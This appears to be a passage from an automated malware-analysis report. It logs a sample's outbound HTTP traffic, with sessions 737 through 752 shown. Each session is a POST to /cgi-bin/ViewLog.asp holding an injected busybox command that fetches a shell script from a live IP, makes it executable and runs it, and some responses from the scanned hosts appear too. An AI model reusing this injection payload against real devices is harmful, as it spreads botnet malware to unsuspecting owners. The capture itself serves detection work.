                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.10 (Debian) Server at dcom.ajuntamentvilanova.local Port 81</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        737192.168.2.234528294.123.81.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:51.429841042 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        738192.168.2.234086694.122.228.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:51.433713913 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        739192.168.2.235817285.215.114.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.112555027 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.439605951 CEST970INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 774
                                                        Date: Sun, 14 Apr 2024 14:36:52 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 36 32 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.62</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        740192.168.2.233952831.200.35.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.136928082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        741192.168.2.235729094.121.23.378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.144856930 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        742192.168.2.233984494.72.116.2428080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.316096067 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.530867100 CEST59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        743192.168.2.233668694.23.192.1998080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.400917053 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        744192.168.2.233888662.84.100.888080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.414313078 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.716423988 CEST207INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Sun, 14 Apr 2024 14:36:52 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        745192.168.2.234493094.122.199.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.449038982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        746192.168.2.233670495.78.127.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.453663111 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.795574903 CEST697INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:52 GMT
                                                        Server: Apache/2.4.56 (Debian)
                                                        Referrer-Policy: no-referrer
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Permitted-Cross-Domain-Policies: none
                                                        X-Robots-Tag: noindex, nofollow
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        747192.168.2.234202295.217.181.1798080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.457250118 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:53.141544104 CEST1289INHTTP/1.1 200 OK
                                                        Content-Type: text/plain
                                                        Date: Sun, 14 Apr 2024 14:36:52 GMT
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=5
                                                        Transfer-Encoding: chunked
                                                        Data Raw: 34 31 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 77 61 63 40 64 62 2d 6d 61 69 6e 2d 61 6c 65 72 74 73 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 6e 6f 72 6d 61 6c 22 7d 20 31 38 37 35 31 30 30 34 0a 0d 0a 33 62 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 77 61 63 40 64 62 2d 6d 61 69 6e 2d 61 6c 65 72 74 73 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 77 61 72 6e 69 6e 67 22 7d 20 30 0a 0d 0a 33 61 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 77 61 63 40 64 62 2d 6d 61 69 6e 2d 61 6c 65 72 74 73 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 64 61 6e 67 65 72 22 7d 20 30 0a 0d 0a 34 38 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 61 6c 65 72 74 73 2d 77 61 63 40 64 62 2d 73 74 61 74 65 68 69 73 74 6f 72 79 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 6e 6f 72 6d 61 6c 22 7d 20 38 30 39 31 39 37 37 0a 0d 0a 34 33 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 61 6c 65 72 74 73 2d 77 61 63 40 64 62 2d 73 74 61 74 65 68 69 73 74 6f 72 79 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 77 61 72 6e 69 6e 67 22 7d 20 30 0a 0d 0a 34 34 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 61 6c 65 72 74 73 2d 77 61 63 40 64 62 2d 73 74 61 74 65 68 69 73 74 6f 72 79 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 64 61 6e 67 65 72 22 7d 20 35 31 35 0a 0d 0a 36 65 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 42 2d 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 41 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 6e 6f 72 6d 61 6c 22 7d 20 34 38 38 37 37 31 0a 0d 0a 36 61 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 42 2d 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 41 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 77 61 72 6e 69 6e 67 22 7d 20 30 0a 0d 0a 36 39 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 42 2d 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 41 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 64 61 6e 67 65 72 22 7d 20 30 0a 0d 0a 36 65 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 42 2d 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 46 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 6e 6f 72 6d 61 6c 22 7d 20 34 38 38 33 30 35 0a 0d 0a 36 61 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 42 2d 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 46 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 77 61 72 6e 69 6e 67 22 7d 20 30 0a 0d 0a 36 39 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74 68 3d 22 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 42 2d 66 69 6c 65 2d 73 65 72 76 65 72 2d 63 6f 63 6b 70 69 74 2d 69 6d 61 67 65 70 72 6f 78 79 2d 46 22 2c 20 76 61 72 69 61 62 6c 65 3d 22 64 61 6e 67 65 72 22 7d 20 30 0a 0d 0a 34 39 0d 0a 77 61 63 33 5f 66 6c 6f 77 7b 70 61 74
                                                        Data Ascii: 41wac3_flow{path="wac@db-main-alerts", variable="normal"} 187510043bwac3_flow{path="wac@db-main-alerts", variable="warning"} 03awac3_flow{path="wac@db-main-alerts", variable="danger"} 048wac3_flow{path="alerts-wac@db-statehistory", variable="normal"} 809197743wac3_flow{path="alerts-wac@db-statehistory", variable="warning"} 044wac3_flow{path="alerts-wac@db-statehistory", variable="danger"} 5156ewac3_flow{path="file-server-cockpit-imageproxy-B-file-server-cockpit-imageproxy-A", variable="normal"} 4887716awac3_flow{path="file-server-cockpit-imageproxy-B-file-server-cockpit-imageproxy-A", variable="warning"} 069wac3_flow{path="file-server-cockpit-imageproxy-B-file-server-cockpit-imageproxy-A", variable="danger"} 06ewac3_flow{path="file-server-cockpit-imageproxy-B-file-server-cockpit-imageproxy-F", variable="normal"} 4883056awac3_flow{path="file-server-cockpit-imageproxy-B-file-server-cockpit-imageproxy-F", variable="warning"} 069wac3_flow{path="file-server-cockpit-imageproxy-B-file-server-cockpit-imageproxy-F", variable="danger"} 049wac3_flow{pat


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        748192.168.2.235122494.120.251.1848080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.475342989 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        749192.168.2.235769894.120.46.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.476953983 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        750192.168.2.234993262.29.81.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.497025013 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        751192.168.2.233562685.95.249.248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:52.507690907 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        752192.168.2.235792095.209.138.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.452296019 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
